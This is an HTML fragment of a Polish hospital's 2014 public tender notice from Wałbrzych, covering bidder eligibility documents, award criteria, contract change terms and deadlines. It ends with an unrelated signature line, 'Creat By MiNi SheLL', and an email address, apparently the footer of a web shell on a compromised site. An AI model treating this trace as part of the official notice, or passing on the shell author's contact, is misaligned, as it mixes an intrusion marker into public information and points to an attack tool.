<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - czas usunięcia awarii wg opisu w punkcie 6b przedmiotu zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące zmiany postanowień Umowy:
Zmiany i uzupełnienia umowy mogą mieć miejsce tylko w przypadkach określonych w Ustawie Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. (tekst jednolity Dz. U. z 2013 r., poz. 907 z późn. zm), lub w przypadku wystąpienia następujących zdarzeń:
1)	Ustawowej zmiany podatku VAT (zmianie ulegnie tylko cena brutto). 
2)	Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
3)	Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy z przyczyn leżących po stronie Zamawiającego, które to przyczyny wpływają na termin realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalistyczny Szpital Ginekologiczno - Położniczy 
im. E. Biernackiego
ul. Paderewskiego 10
58-301 Wałbrzych
Dział Techniczny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2014 godzina 10:00, miejsce: Specjalistyczny Szpital Ginekologiczno - Położniczy 
im. E. Biernackiego
ul. Paderewskiego 10
58-301 Wałbrzych
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com